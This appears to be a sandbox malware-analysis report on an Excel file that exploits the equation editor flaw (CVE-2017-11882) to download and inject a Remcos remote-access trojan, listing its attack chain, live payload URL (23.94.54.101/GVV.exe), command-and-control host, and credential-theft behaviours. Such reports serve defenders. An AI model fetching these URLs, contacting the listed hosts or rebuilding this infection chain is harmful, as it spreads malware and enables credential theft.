          Source: deblaterate.exe.3.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
          Source: deblaterate.exeBinary or memory string: WIN_XPe
          Source: deblaterate.exeBinary or memory string: WIN_VISTA
          Source: deblaterate.exeBinary or memory string: WIN_7
          Source: deblaterate.exeBinary or memory string: WIN_8

          Remote Access Functionality

          barindex
          Source: C:\Windows\SysWOW64\svchost.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-E70NOSJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-E70NOSJump to behavior
          Source: Yara matchFile source: 6.2.deblaterate.exe.720000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.deblaterate.exe.1070000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.deblaterate.exe.720000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.deblaterate.exe.1070000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.988904668.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.800846202.0000000000720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.836348083.0000000001070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.837394121.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: deblaterate.exe PID: 2008, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1812, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: deblaterate.exe PID: 1868, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 920, type: MEMORYSTR
          Source: C:\Windows\SysWOW64\svchost.exeCode function: cmd.exe7_2_0040569A
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A71204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,3_2_00A71204
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A71806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,3_2_00A71806
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00DC1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,6_2_00DC1204
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00DC1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,6_2_00DC1806
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information211
          Scripting
          2
          Valid Accounts
          1
          Native API
          211
          Scripting
          1
          Exploitation for Privilege Escalation
          1
          Disable or Modify Tools
          2
          OS Credential Dumping
          2
          System Time Discovery
          Remote Services11
          Archive Collected Data
          23
          Ingress Tool Transfer
          Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts33
          Exploitation for Client Execution
          1
          DLL Side-Loading
          1
          DLL Side-Loading
          1
          Deobfuscate/Decode Files or Information
          221
          Input Capture
          1
          Account Discovery
          Remote Desktop Protocol1
          Data from Local System
          2
          Encrypted Channel
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts1
          Command and Scripting Interpreter
          2
          Valid Accounts
          1
          Bypass User Account Control
          2
          Obfuscated Files or Information
          1
          Credentials in Registry
          1
          System Service Discovery
          SMB/Windows Admin Shares2
          Email Collection
          1
          Non-Standard Port
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal Accounts2
          Service Execution
          1
          Windows Service
          2
          Valid Accounts
          1
          DLL Side-Loading
          3
          Credentials In Files
          4
          File and Directory Discovery
          Distributed Component Object Model221
          Input Capture
          1
          Remote Access Software
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchd2
          Registry Run Keys / Startup Folder
          21
          Access Token Manipulation
          1
          Bypass User Account Control
          LSA Secrets38
          System Information Discovery
          SSH3
          Clipboard Data
          2
          Non-Application Layer Protocol
          Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
          Windows Service
          1
          Masquerading
          Cached Domain Credentials22
          Security Software Discovery
          VNCGUI Input Capture112
          Application Layer Protocol
          Data Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items422
          Process Injection
          2
          Valid Accounts
          DCSync11
          Virtualization/Sandbox Evasion
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job2
          Registry Run Keys / Startup Folder
          11
          Virtualization/Sandbox Evasion
          Proc Filesystem4
          Process Discovery
          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
          Access Token Manipulation
          /etc/passwd and /etc/shadow11
          Application Window Discovery
          Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron422
          Process Injection
          Network Sniffing1
          System Owner/User Discovery
          Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
          Remote System Discovery
          Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 1436298 Sample: 202404294766578200.xlam.xlsx Startdate: 04/05/2024 Architecture: WINDOWS Score: 100 75 Multi AV Scanner detection for domain / URL 2->75 77 Found malware configuration 2->77 79 Malicious sample detected (through community Yara rule) 2->79 81 20 other signatures 2->81 10 EXCEL.EXE 6 11 2->10         started        12 wscript.exe 1 2->12         started        process3 signatures4 15 EQNEDT32.EXE 1 10->15         started        101 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->101 20 deblaterate.exe 2 12->20         started        process5 dnsIp6 55 23.94.54.101, 49161, 80 AS-COLOCROSSINGUS United States 15->55 43 C:\Users\user\AppData\Roaming\CKK.exe, PE32 15->43 dropped 57 Office equation editor establishes network connection 15->57 59 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 15->59 22 CKK.exe 6 15->22         started        61 Binary is likely a compiled AutoIt script file 20->61 63 Writes to foreign memory regions 20->63 65 Maps a DLL or memory area into another process 20->65 26 svchost.exe 20->26         started        file7 signatures8 process9 file10 45 C:\Users\user\AppData\...\deblaterate.exe, PE32 22->45 dropped 91 Multi AV Scanner detection for dropped file 22->91 93 Binary is likely a compiled AutoIt script file 22->93 95 Machine Learning detection for dropped file 22->95 97 Found API chain indicative of sandbox detection 22->97 28 deblaterate.exe 3 22->28         started        99 Detected Remcos RAT 26->99 signatures11 process12 file13 47 C:\Users\user\AppData\...\deblaterate.vbs, data 28->47 dropped 103 Binary is likely a compiled AutoIt script file 28->103 105 Machine Learning detection for dropped file 28->105 107 Drops VBS files to the startup folder 28->107 109 3 other signatures 28->109 32 svchost.exe 3 11 28->32         started        signatures14 process15 dnsIp16 49 yuahdgbceja.sytes.net 32->49 51 geoplugin.net 32->51 53 2 other IPs or domains 32->53 67 System process connects to network (likely due to code injection or exploit) 32->67 69 Contains functionality to bypass UAC (CMSTPLUA) 32->69 71 Detected Remcos RAT 32->71 73 7 other signatures 32->73 36 svchost.exe 1 32->36         started        39 svchost.exe 1 32->39         started        41 svchost.exe 11 32->41         started        signatures17 process18 signatures19 83 Tries to steal Instant Messenger accounts or passwords 36->83 85 Tries to steal Mail credentials (via file / registry access) 36->85 87 Searches for Windows Mail specific files 36->87 89 Tries to harvest and steal browser information (history, passwords, etc) 39->89

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          202404294766578200.xlam.xlsx68%ReversingLabsDocument-Office.Exploit.CVE-2017-11882
          202404294766578200.xlam.xlsx59%VirustotalBrowse
          202404294766578200.xlam.xlsx100%AviraEXP/CVE-2017-11882.Gen
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\silvexes\deblaterate.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\CKK.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\CKK.exe75%ReversingLabsWin32.Backdoor.Remcos
          C:\Users\user\AppData\Roaming\CKK.exe65%VirustotalBrowse
          No Antivirus matches
          SourceDetectionScannerLabelLink
          yuahdgbceja.sytes.net1%VirustotalBrowse
          geoplugin.net4%VirustotalBrowse
          SourceDetectionScannerLabelLink
          http://www.imvu.comr0%URL Reputationsafe
          https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
          http://geoplugin.net/json.gp/C100%URL Reputationphishing
          http://geoplugin.net/json.gp100%URL Reputationphishing
          http://www.ebuddy.com0%URL Reputationsafe
          http://b.scorecardresearch.com/beacon.js0%Avira URL Cloudsafe
          http://geoplugin.net/json.gp/0%Avira URL Cloudsafe
          http://23.94.54.101/GVV.exe100%Avira URL Cloudmalware
          http://23.94.54.101/GVV.exeXC0%Avira URL Cloudsafe
          http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
          http://cache.btrll.com/default/Pix-1x1.gif0%Avira URL Cloudsafe
          https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au0%Avira URL Cloudsafe
          http://geoplugin.net/json.gp/0%VirustotalBrowse
          yuahdgbceja.sytes.net0%Avira URL Cloudsafe
          http://cache.btrll.com/default/Pix-1x1.gif0%VirustotalBrowse
          https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au0%VirustotalBrowse
          http://23.94.54.101/GVV.exe15%VirustotalBrowse
          yuahdgbceja.sytes.net1%VirustotalBrowse
          http://b.scorecardresearch.com/beacon.js0%VirustotalBrowse
          NameIPActiveMaliciousAntivirus DetectionReputation
          yuahdgbceja.sytes.net
          23.94.53.100
          truetrueunknown
          geoplugin.net
          178.237.33.50
          truetrueunknown
          NameMaliciousAntivirus DetectionReputation
          http://23.94.54.101/GVV.exetrue
          • 15%, Virustotal, Browse
          • Avira URL Cloud: malware
          unknown
          http://geoplugin.net/json.gptrue
          • URL Reputation: phishing
          unknown
          yuahdgbceja.sytes.nettrue
          • 1%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          http://b.scorecardresearch.com/beacon.jsbhvA870.tmp.10.drfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://acdn.adnxs.com/ast/ast.jsbhvA870.tmp.10.drfalse
            high
            http://www.imvu.comrsvchost.exe, 00000007.00000002.989003730.0000000001E30000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000C.00000002.813543511.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_bhvA870.tmp.10.drfalse
              high
              https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1bhvA870.tmp.10.drfalse
                high
                https://support.google.comsvchost.exe, 0000000A.00000003.816775891.0000000001D6D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.816934273.0000000001D6D000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  http://geoplugin.net/json.gp/svchost.exe, 00000007.00000002.988954665.00000000005F4000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://support.google.com/chrome/?p=plugin_flashsvchost.exe, 0000000A.00000003.816695888.0000000001D48000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.pngbhvA870.tmp.10.drfalse
                      high
                      https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9bhvA870.tmp.10.drfalse
                        high
                        http://23.94.54.101/GVV.exeXCEQNEDT32.EXE, 00000002.00000002.458563608.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.htmlbhvA870.tmp.10.drfalse
                          high
                          http://www.nirsoft.netsvchost.exe, 0000000A.00000002.816856030.0000000000224000.00000004.00000010.00020000.00000000.sdmpfalse
                            high
                            https://deff.nelreports.net/api/report?cat=msnbhvA870.tmp.10.drfalse
                            • URL Reputation: safe
                            unknown
                            https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.jsbhvA870.tmp.10.drfalse
                              high
                              http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comsvchost.exe, 00000007.00000002.989003730.0000000001E30000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000C.00000002.813543511.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://cache.btrll.com/default/Pix-1x1.gifbhvA870.tmp.10.drfalse
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              unknown
                              http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683bhvA870.tmp.10.drfalse
                                high
                                https://www.google.comsvchost.exe, 00000007.00000002.989003730.0000000001E30000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000C.00000002.813543511.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                  high
                                  http://geoplugin.net/json.gp/Cdeblaterate.exe, 00000006.00000002.800846202.0000000000720000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.988904668.0000000000400000.00000040.80000000.00040000.00000000.sdmp, deblaterate.exe, 0000000E.00000002.836348083.0000000001070000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.837394121.0000000000400000.00000040.80000000.00040000.00000000.sdmptrue
                                  • URL Reputation: phishing
                                  unknown
                                  http://o.aolcdn.com/ads/adswrappermsni.jsbhvA870.tmp.10.drfalse
                                    high
                                    http://cdn.taboola.com/libtrc/msn-home-network/loader.jsbhvA870.tmp.10.drfalse
                                      high
                                      http://www.msn.com/?ocid=iehpbhvA870.tmp.10.drfalse
                                        high
                                        https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033bhvA870.tmp.10.drfalse
                                          high
                                          http://static.chartbeat.com/js/chartbeat.jsbhvA870.tmp.10.drfalse
                                            high
                                            http://www.msn.com/de-de/?ocid=iehpbhvA870.tmp.10.drfalse
                                              high
                                              http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%bhvA870.tmp.10.drfalse
                                                high
                                                http://www.nirsoft.net/svchost.exe, 0000000C.00000002.813543511.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                  high
                                                  https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3bhvA870.tmp.10.drfalse
                                                    high
                                                    http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683bhvA870.tmp.10.drfalse
                                                      high
                                                      http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(bhvA870.tmp.10.drfalse
                                                        high
                                                        https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9bhvA870.tmp.10.drfalse
                                                          high
                                                          http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_shbhvA870.tmp.10.drfalse
                                                            high
                                                            http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.jsbhvA870.tmp.10.drfalse
                                                              high
                                                              https://www.ccleaner.com/go/app_cc_pro_trialkeybhvA870.tmp.10.drfalse
                                                                high
                                                                http://www.imvu.com/svchost.exe, 0000000C.00000002.813423105.00000000001DC000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://contextual.media.net/8/nrrV73987.jsbhvA870.tmp.10.drfalse
                                                                    high
                                                                    http://www.imvu.comsvchost.exe, 00000007.00000002.989003730.0000000001E30000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000C.00000002.813506737.00000000002A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.813543511.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                      high
                                                                      https://contextual.media.net/bhvA870.tmp.10.drfalse
                                                                        high
                                                                        http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.jsbhvA870.tmp.10.drfalse
                                                                          high
                                                                          https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2bhvA870.tmp.10.drfalse
                                                                            high
                                                                            http://www.msn.com/bhvA870.tmp.10.drfalse
                                                                              high
                                                                              https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:aubhvA870.tmp.10.drfalse
                                                                              • 0%, Virustotal, Browse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549bhvA870.tmp.10.drfalse
                                                                                high
                                                                                http://cdn.at.atwola.com/_media/uac/msn.htmlbhvA870.tmp.10.drfalse
                                                                                  high
                                                                                  http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2FsetbhvA870.tmp.10.drfalse
                                                                                    high
                                                                                    https://policies.yahoo.com/w3c/p3p.xmlbhvA870.tmp.10.drfalse
                                                                                      high
                                                                                      http://www.msn.com/advertisement.ad.jsbhvA870.tmp.10.drfalse
                                                                                        high
                                                                                        http://www.ebuddy.comsvchost.exe, 00000007.00000002.989003730.0000000001E30000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000C.00000002.813543511.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs
                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        23.94.54.101
                                                                                        unknownUnited States
                                                                                        36352AS-COLOCROSSINGUStrue
                                                                                        23.94.53.100
                                                                                        yuahdgbceja.sytes.netUnited States
                                                                                        36352AS-COLOCROSSINGUStrue
                                                                                        178.237.33.50
                                                                                        geoplugin.netNetherlands
                                                                                        8455ATOM86-ASATOM86NLtrue
                                                                                        Joe Sandbox version:40.0.0 Tourmaline
                                                                                        Analysis ID:1436298
                                                                                        Start date and time:2024-05-04 10:00:58 +02:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 11m 41s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                        Number of analysed new started processes analysed:16
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:202404294766578200.xlam.xlsx
                                                                                        Detection:MAL
                                                                                        Classification:mal100.phis.troj.spyw.expl.evad.winXLSX@19/18@2/3
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 100%
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 99%
                                                                                        • Number of executed functions: 85
                                                                                        • Number of non-executed functions: 274
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .xlsx
                                                                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                        • Attach to Office via COM
                                                                                        • Active ActiveX Object
                                                                                        • Scroll down
                                                                                        • Close Viewer
                                                                                        • Override analysis time to 48056.6648642571 for current running targets taking high CPU consumption
                                                                                        • Override analysis time to 96113.3297285142 for current running targets taking high CPU consumption
                                                                                        • Override analysis time to 192226.659457028 for current running targets taking high CPU consumption
                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
                                                                                        • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                        TimeTypeDescription
                                                                                        01:05:20AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs
                                                                                        10:02:36API Interceptor27x Sleep call for process: EQNEDT32.EXE modified
                                                                                        10:05:19API Interceptor810185x Sleep call for process: svchost.exe modified
                                                                                        10:05:29API Interceptor17x Sleep call for process: wscript.exe modified
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        23.94.54.101PO 2_5_24.xlam.xlsxGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                                        • 23.94.54.101/ISW.exe
                                                                                        Order Request1_5_24.xlam.xlsxGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                                        • 23.94.54.101/IZG.exe
                                                                                        202404294766578200.xlam.xlsxGet hashmaliciousRemcosBrowse
                                                                                        • 23.94.54.101/GVV.exe
                                                                                        attachment.xlam.xlsxGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                                        • 23.94.54.101/EPQ.exe
                                                                                        NI-45733-D.xlam.xlsxGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                                        • 23.94.54.101/ESS.exe
                                                                                        23.94.53.100GVV.exeGet hashmaliciousRemcosBrowse
                                                                                          202404294766578200.xlam.xlsxGet hashmaliciousRemcosBrowse
                                                                                            178.237.33.50QUOTATION#30810.exeGet hashmaliciousRemcosBrowse
                                                                                            • geoplugin.net/json.gp
                                                                                            proof of payment.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                            • geoplugin.net/json.gp
                                                                                            fatura.bat.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                            • geoplugin.net/json.gp
                                                                                            proof of paymentt.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                            • geoplugin.net/json.gp
                                                                                            586 R1 M-LINE - GEORGIA 03.05.2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                            • geoplugin.net/json.gp
                                                                                            xi0TpAxHGMsm.exeGet hashmaliciousRemcosBrowse
                                                                                            • geoplugin.net/json.gp
                                                                                            PO-USC-22USC-KonchoCo.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                            • geoplugin.net/json.gp
                                                                                            REVISED NEW ORDER 7936-2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                            • geoplugin.net/json.gp
                                                                                            INQUIRY#46789.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                                            • geoplugin.net/json.gp
                                                                                            Teklif talebi BAKVENTA-BAKUUsurpationens.cmdGet hashmaliciousGuLoader, RemcosBrowse
                                                                                            • geoplugin.net/json.gp
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            yuahdgbceja.sytes.netGVV.exeGet hashmaliciousRemcosBrowse
                                                                                            • 23.94.53.100
                                                                                            202404294766578200.xlam.xlsxGet hashmaliciousRemcosBrowse
                                                                                            • 23.94.53.100
                                                                                            geoplugin.netQUOTATION#30810.exeGet hashmaliciousRemcosBrowse
                                                                                            • 178.237.33.50
                                                                                            proof of payment.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                            • 178.237.33.50
                                                                                            fatura.bat.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                            • 178.237.33.50
                                                                                            proof of paymentt.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                            • 178.237.33.50
                                                                                            586 R1 M-LINE - GEORGIA 03.05.2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                            • 178.237.33.50
                                                                                            xi0TpAxHGMsm.exeGet hashmaliciousRemcosBrowse
                                                                                            • 178.237.33.50
                                                                                            PO-USC-22USC-KonchoCo.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                            • 178.237.33.50
                                                                                            REVISED NEW ORDER 7936-2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                            • 178.237.33.50
                                                                                            INQUIRY#46789.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                                            • 178.237.33.50
                                                                                            Teklif talebi BAKVENTA-BAKUUsurpationens.cmdGet hashmaliciousGuLoader, RemcosBrowse
                                                                                            • 178.237.33.50
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            AS-COLOCROSSINGUSConfirm!!.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                            • 192.227.130.26
                                                                                            PIO88938MB.docx.docGet hashmaliciousUnknownBrowse
                                                                                            • 107.172.31.6
                                                                                            QUOTATION#30810.exeGet hashmaliciousRemcosBrowse
                                                                                            • 172.245.208.13
                                                                                            youhaveonefilefortody.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                            • 172.245.123.18
                                                                                            s9ZjvgSMt1.rtfGet hashmaliciousUnknownBrowse
                                                                                            • 192.3.101.142
                                                                                            getinher.docGet hashmaliciousAgentTeslaBrowse
